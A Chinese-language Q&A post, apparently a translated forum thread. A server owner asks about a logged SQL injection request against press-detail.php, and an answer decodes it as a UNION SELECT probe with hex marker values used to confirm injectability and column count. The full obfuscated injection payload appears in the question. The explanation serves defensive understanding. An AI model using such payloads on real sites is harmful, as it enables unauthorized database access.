我一直在我的一台服务器上看到这个sql注入/攻击,并想知道它想要做什么。我知道这是一次攻击,谷歌搜索后我发现它被大量使用但我没有看到它的作用以及十六进制或二进制是什么的解释。这是攻击
press-detail.php?id=999999.9+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39,0x393133353134353632392e39,0x39313335313435363231302e39,0x39313335313435363231312e39,0x39313335313435363231322e39,0x39313335313435363231332e39,0x39313335313435363231342e39,0x39313335313435363231352e39,0x39313335313435363231362e39,0x39313335313435363231372e39,0x39313335313435363231382e39,0x39313335313435363231392e39,0x39313335313435363232302e39,0x39313335313435363232312e39,0x39313335313435363232322e39,0x39313335313435363232332e39,0x39313335313435363232342e39,0x39313335313435363232352e39,0x39313335313435363232362e39,0x39313335313435363232372e39,0x39313335313435363232382e39,0x39313335313435363232392e39,0x39313335313435363233302e39,0x39313335313435363233312e39,0x39313335313435363233322e39,0x39313335313435363233332e39,0x39313335313435363233342e39,0x39313335313435363233352e39,0x39313335313435363233362e39,0x39313335313435363233372e39,0x39313335313435363233382e39,0x39313335313435363233392e39,0x39313335313435363234302e39,0x39313335313435363234312e39,0x39313335313435363234322e39,0x39313335313435363234332e39,0x39313335313435363234342e39,0x39313335313435363234352e39,0x39313335313435363234362e39,0x39313335313435363234372e39,0x39313335313435363234382e39,0x39313335313435363234392e39,0x39313335313435363235302e39,0x39313335313435363235312e39,0x39313335313435363235322e39,0x39313335313435363235332e39,0x39313335313435363235342e39,0x39313335313435363235352e39,0x39313335313435363235362e39,0x39313335313435363235372e39,0x39313335313435363235382e39,0x39313335313435363235392e39,0x39313335313435363236302e39,0x39313335313435363236312e39,0x39313335313435363236322e39,0x39313335313435363236332e39,0x39313335313435363236342e39,0x39313335313435363236352e39,0x39313335313435363236362e39,0x39313335313435363236372e39,0x39313335313435363236382e39,0x39313335313435363236392e39,0x39313335313435363237302e39,0x39313335313435363237312e39,0x39313335313435363237322e39,0x39313335313435363237332e39+and+'1'='1
我想知道为什么" 999999.9",什么是" 0x39313335313435363237322e39"。当这种攻击有效时,黑客会对数据库进行哪些信息或编辑。最后这次攻击可能一次又一次地使服务器崩溃/崩溃吗?
非常感谢对此代码的任何解释。
答案 0 :(得分:6)
所以,正如being used a lot一样,我会提交答案。
在我看来,这些请求的目的是检查是否存在sql注入。这是尝试注入的查询的一部分:
999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" and '1'='1
攻击者的目标是以这种方式完成查询:
SELECT * FROM table WHERE field=999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9"
如果未清除field,并且仅当UNION SELECT中使用的列数与查询列匹配时,很可能会在某处显示字符串91351456272.9这页纸。
这将是攻击者确认页面中的漏洞。